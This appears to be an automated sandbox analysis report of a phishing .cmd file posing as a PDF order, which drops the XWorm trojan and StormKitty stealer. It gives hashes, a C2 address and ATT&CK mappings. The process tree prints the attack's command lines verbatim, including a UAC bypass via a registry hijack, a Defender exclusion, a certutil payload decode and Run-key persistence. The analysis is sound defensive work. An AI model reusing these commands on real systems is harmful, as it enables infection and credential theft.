stormkitty | 6793403490af9417bae8ce93069b5ee31bd28ec0e3fea56f00bee38815cb530d

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-01-2025 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd
Size

2.6MB
MD5

e9310ff7859997821cabdb77fa1fc48a
SHA1

14162fb813665c6e33e4e96278f05489f89b7025
SHA256

a5fd7ac848ce34637de12d1925e2ebcad0f5ab7e833b66933e4bcf6791d0ceb6
SHA512

e40686cb59439ca252eefd5363701b37555a9ed59812c7af7833fb566e74cd260f30c7e14d9a41ca632e1642480d473827701937af8c00d9754cd6d3565cb6c9
SSDEEP

24576:W1sg0bAvBbbTatN015Xp34cZY1cPXCn+RCN1DVkOUH01Si8nZhh2R1hIw/pZEGXE:W1svbAvBb7535k001SiMqpXXXcp

Score

10^/10

stormkitty xworm discovery persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

79.110.49.39:5319

Mutex

7meUpyW3fQgeRauF

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/memory/4908-591-0x000000002E260000-0x000000002E272000-memory.dmp	family_xworm
behavioral2/memory/4908-594-0x000000002E410000-0x000000002E420000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/4908-604-0x0000000032EB0000-0x0000000032FD0000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	doxdtthV.pif
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 32 IoCs

pid	Process
4344	alpha.exe
4532	alpha.exe
3952	alpha.exe
916	CApha.exe
2948	alpha.exe
4340	CApha.exe
4212	alpha.exe
4368	CApha.exe
1604	alpha.exe
4804	xkn.exe
4120	alpha.exe
4612	ger.exe
712	per.exe
3820	alpha.exe
3404	phf.exe
1224	alpha.exe
4296	phf.exe
2124	AnyDesk.pif
4364	alpha.exe
2348	alpha.exe
1152	alpha.exe
4568	alpha.exe
3252	alpha.exe
4552	alpha.exe
524	alpha.exe
808	alpha.exe
4576	alpha.exe
1196	alpha.exe
3936	alpha.exe
3248	alpha.exe
4908	doxdtthV.pif
116	mddrdk.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vhttdxod = "C:\\Users\\Public\\Vhttdxod.url"	AnyDesk.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
20	drive.google.com
23	drive.google.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2124 set thread context of 4908	2124	AnyDesk.pif	135

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3120	4908	WerFault.exe	135

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mddrdk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AnyDesk.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	doxdtthV.pif

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1152	alpha.exe
8	PING.EXE

Kills process with taskkill 2 IoCs

evasion

pid	Process
4352	taskkill.exe
2312	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\ms-settings\shell	ger.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
8	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	27	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4804	xkn.exe
4804	xkn.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe
116	mddrdk.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4804	xkn.exe
Token: SeDebugPrivilege	4352	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	4908	doxdtthV.pif

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 1704	1032	cmd.exe	83
PID 1032 wrote to memory of 1704	1032	cmd.exe	83
PID 1032 wrote to memory of 3044	1032	cmd.exe	84
PID 1032 wrote to memory of 3044	1032	cmd.exe	84
PID 1032 wrote to memory of 1200	1032	cmd.exe	85
PID 1032 wrote to memory of 1200	1032	cmd.exe	85
PID 1032 wrote to memory of 4344	1032	cmd.exe	86
PID 1032 wrote to memory of 4344	1032	cmd.exe	86
PID 1032 wrote to memory of 4532	1032	cmd.exe	87
PID 1032 wrote to memory of 4532	1032	cmd.exe	87
PID 1032 wrote to memory of 3952	1032	cmd.exe	88
PID 1032 wrote to memory of 3952	1032	cmd.exe	88
PID 3952 wrote to memory of 916	3952	alpha.exe	89
PID 3952 wrote to memory of 916	3952	alpha.exe	89
PID 1032 wrote to memory of 2948	1032	cmd.exe	90
PID 1032 wrote to memory of 2948	1032	cmd.exe	90
PID 2948 wrote to memory of 4340	2948	alpha.exe	91
PID 2948 wrote to memory of 4340	2948	alpha.exe	91
PID 1032 wrote to memory of 4212	1032	cmd.exe	92
PID 1032 wrote to memory of 4212	1032	cmd.exe	92
PID 4212 wrote to memory of 4368	4212	alpha.exe	93
PID 4212 wrote to memory of 4368	4212	alpha.exe	93
PID 1032 wrote to memory of 1604	1032	cmd.exe	94
PID 1032 wrote to memory of 1604	1032	cmd.exe	94
PID 1604 wrote to memory of 4804	1604	alpha.exe	95
PID 1604 wrote to memory of 4804	1604	alpha.exe	95
PID 4804 wrote to memory of 4120	4804	xkn.exe	96
PID 4804 wrote to memory of 4120	4804	xkn.exe	96
PID 4120 wrote to memory of 4612	4120	alpha.exe	97
PID 4120 wrote to memory of 4612	4120	alpha.exe	97
PID 1032 wrote to memory of 712	1032	cmd.exe	98
PID 1032 wrote to memory of 712	1032	cmd.exe	98
PID 1032 wrote to memory of 3820	1032	cmd.exe	104
PID 1032 wrote to memory of 3820	1032	cmd.exe	104
PID 3820 wrote to memory of 3404	3820	alpha.exe	105
PID 3820 wrote to memory of 3404	3820	alpha.exe	105
PID 1032 wrote to memory of 1224	1032	cmd.exe	107
PID 1032 wrote to memory of 1224	1032	cmd.exe	107
PID 1224 wrote to memory of 4296	1224	alpha.exe	108
PID 1224 wrote to memory of 4296	1224	alpha.exe	108
PID 1032 wrote to memory of 2124	1032	cmd.exe	109
PID 1032 wrote to memory of 2124	1032	cmd.exe	109
PID 1032 wrote to memory of 2124	1032	cmd.exe	109
PID 1032 wrote to memory of 4364	1032	cmd.exe	110
PID 1032 wrote to memory of 4364	1032	cmd.exe	110
PID 4364 wrote to memory of 4352	4364	alpha.exe	111
PID 4364 wrote to memory of 4352	4364	alpha.exe	111
PID 1032 wrote to memory of 2348	1032	cmd.exe	113
PID 1032 wrote to memory of 2348	1032	cmd.exe	113
PID 2348 wrote to memory of 2312	2348	alpha.exe	114
PID 2348 wrote to memory of 2312	2348	alpha.exe	114
PID 1032 wrote to memory of 1152	1032	cmd.exe	115
PID 1032 wrote to memory of 1152	1032	cmd.exe	115
PID 1152 wrote to memory of 8	1152	alpha.exe	116
PID 1152 wrote to memory of 8	1152	alpha.exe	116
PID 1032 wrote to memory of 4568	1032	cmd.exe	117
PID 1032 wrote to memory of 4568	1032	cmd.exe	117
PID 1032 wrote to memory of 3252	1032	cmd.exe	118
PID 1032 wrote to memory of 3252	1032	cmd.exe	118
PID 1032 wrote to memory of 4552	1032	cmd.exe	119
PID 1032 wrote to memory of 4552	1032	cmd.exe	119
PID 1032 wrote to memory of 524	1032	cmd.exe	120
PID 1032 wrote to memory of 524	1032	cmd.exe	120
PID 1032 wrote to memory of 808	1032	cmd.exe	121

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.exe /o
  2⤵
  PID:1704
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\extrac32.exe /d C:\\Users\\Public\\CApha.exe /o
  2⤵
  PID:3044
- C:\Windows\System32\esentutl.exe
  C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\certutil.exe /d C:\\Users\\Public\\phf.exe /o
  2⤵
  PID:1200
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:4344
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3952
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    - Executes dropped EXE
    PID:916
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2948
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    - Executes dropped EXE
    PID:4340
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4212
- - C:\Users\Public\CApha.exe
    C:\\Users\\Public\\CApha /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    - Executes dropped EXE
    PID:4368
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1604
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionExtension .pif"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4804
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4120
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionExtension .pif"
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4612
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:712
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3820
- - C:\Users\Public\phf.exe
    C:\\Users\\Public\\phf -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Adline-Order_New Material_Specification_Order_no_MGP8K804 ,pdf.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
    3⤵
    - Executes dropped EXE
    PID:3404
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Users\Public\phf.exe
    C:\\Users\\Public\\phf -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
    3⤵
    - Executes dropped EXE
    PID:4296
- C:\Users\Public\Libraries\AnyDesk.pif
  C:\Users\Public\Libraries\AnyDesk.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
    3⤵
    - System Location Discovery: System Language Discovery
    PID:756
- - C:\Users\Public\Libraries\doxdtthV.pif
    C:\Users\Public\Libraries\doxdtthV.pif
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\mddrdk.exe
      "C:\Users\Admin\AppData\Local\Temp\mddrdk.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 2068
      4⤵
      Program crash
      PID:3120
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4364
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4352
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettingsAdminFlows.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 5
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:8
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:4568
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:3252
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:4552
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:524
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:808
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CApha.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:4576
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:1196
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\phf.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3936
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.avi" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3248

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:3588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4908 -ip 4908
1⤵
PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xxeqtasq.xh0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\mddrdk.exe

Filesize
282KB

MD5
d507d45d3f4d0b9e2be7613f31ad4e06

SHA1
77b0e9b2d4bc9b64713e412915b3746d52d689e7

SHA256
51405a433b7aee631ceb5151dbd6ebed756321dbc8797472765333603b7664a9

SHA512
e1b6ac08973c9bc3fdde6368657b34930948ffc32d91ef7b1474257fb0240d71bdedddf7c418c3c687a920650236c1f056962c5a568bd1a6e360308dd87ecda0

Download Submit
C:\Users\Public\AnyDesk.avi

Filesize
1.9MB

MD5
4c5df8cd0e2a293bf438d1288b28ade2

SHA1
0e92ea51b7b1932dead2301e518574beccf4f6c2

SHA256
46f40dc1d81da0ab9b892b6d7ae93b543f2d22e872aa72a09cf70aea1f8ff1b2

SHA512
ab0bfcf7c98530266b08862c46530b03645937224c947a8f17a801b7c4f4d2db885722aed536f11365a7f4df2c99df04108208fa9fd2ff84cec535488d4e49fa

Download Submit
C:\Users\Public\CApha.exe

Filesize
34KB

MD5
41330d97bf17d07cd4308264f3032547

SHA1
0fcd5a3233316939129e6fcf4323e925e8406e5d

SHA256
a224559fd6621066347a5ba8f4aeeceea8a0a7a881a71bd36de69aceb52e9df7

SHA512
ae29e41c01ee6620fe822f9feb3dd851617314cec4d8ef750d2ebd2c61bd24fb54012146123f1fdf9b893f26e83ce5a17dbc5d3aae42bb04daab6d42e82f2a04

Download Submit
C:\Users\Public\Libraries\AnyDesk.pif

Filesize
958KB

MD5
8666ee474e2c330ddb37bec62216abd3

SHA1
3b5835f1ed96bfe9ac2b027d433f8c90a1f96416

SHA256
fe6843e766f78bfa46190600722fe39184209adb1b1c6a2533296170e66f9a05

SHA512
b6a4aeeb30685fda1c6f7008ac3cd4e6a6ab171d53e890d88fa3b954eb74dd404c3c490a2413653adb74e139cd936f665e5cfd4340eaba70e24c43bfa06c692e

Download Submit
C:\Users\Public\Libraries\FX.cmd

Filesize
8KB

MD5
60cd0be570decd49e4798554639a05ae

SHA1
bd7bed69d9ab9a20b5263d74921c453f38477bcb

SHA256
ca6a6c849496453990beceef8c192d90908c0c615fa0a1d01bcd464bad6966a5

SHA512
ab3dbdb4ed95a0cb4072b23dd241149f48ecff8a69f16d81648e825d9d81a55954e5dd9bc46d3d7408421df30c901b9ad1385d1e70793fa8d715c86c9e800c57

Download Submit
C:\Users\Public\Libraries\doxdtthV.pif

Filesize
171KB

MD5
22331abcc9472cc9dc6f37faf333aa2c

SHA1
2a001c30ba79a19ceaf6a09c3567c70311760aa4

SHA256
bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c

SHA512
c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\phf.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/1704-0-0x0000018AC0FE0000-0x0000018AC0FF0000-memory.dmp

Filesize
64KB

Download
memory/1704-23-0x0000018AC1460000-0x0000018AC1470000-memory.dmp

Filesize
64KB

Download
memory/4804-120-0x00000208C6130000-0x00000208C6152000-memory.dmp

Filesize
136KB

Download
memory/4908-595-0x0000000030C20000-0x0000000030CBC000-memory.dmp

Filesize
624KB

Download
memory/4908-594-0x000000002E410000-0x000000002E420000-memory.dmp

Filesize
64KB

Download
memory/4908-593-0x0000000030E20000-0x00000000313C4000-memory.dmp

Filesize
5.6MB

Download
memory/4908-597-0x00000000318D0000-0x0000000031936000-memory.dmp

Filesize
408KB

Download
memory/4908-598-0x00000000322A0000-0x0000000032332000-memory.dmp

Filesize
584KB

Download
memory/4908-604-0x0000000032EB0000-0x0000000032FD0000-memory.dmp

Filesize
1.1MB

Download
memory/4908-591-0x000000002E260000-0x000000002E272000-memory.dmp

Filesize
72KB

Download
memory/4908-605-0x0000000033020000-0x0000000033374000-memory.dmp

Filesize
3.3MB

Download
memory/4908-609-0x00000000333C0000-0x000000003340C000-memory.dmp

Filesize
304KB

Download